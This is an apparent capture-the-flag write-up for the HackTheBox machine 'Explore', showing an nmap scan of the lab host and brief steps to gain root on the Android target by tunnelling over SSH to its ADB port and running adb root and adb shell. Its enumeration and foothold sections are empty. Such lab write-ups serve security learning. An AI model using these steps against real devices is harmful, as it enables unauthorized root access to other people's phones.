HackTheBox — Explore

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:57 EET
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.14s latency).

PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
35971/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.80%I=7%D=7/2%Time=60DF1B3D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phone

Enumeration

Initial Foothold

Getting root

  • First, We have to do port forwarding using ssh because the service is running on localhost only. ssh -p 2222 -L 1337:localhost:5555 kristi@10.10.10.247
  • That means 127.0.0.1:1337 ==> 10.10.10.247:5555
  • Connect to ADB service (port 5555) using adb tool. adb connect <IP>:<PORT>
  • Check if the phone is connected to your pc. adb devices
  • Now using adb tool we can do anything on the device, so to get root type adb root
  • to restart adbd daemon with root permissions.
  • Connect again to the ADB service. adb connect <IP>:<PORT>
  • Finally. adb shell

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store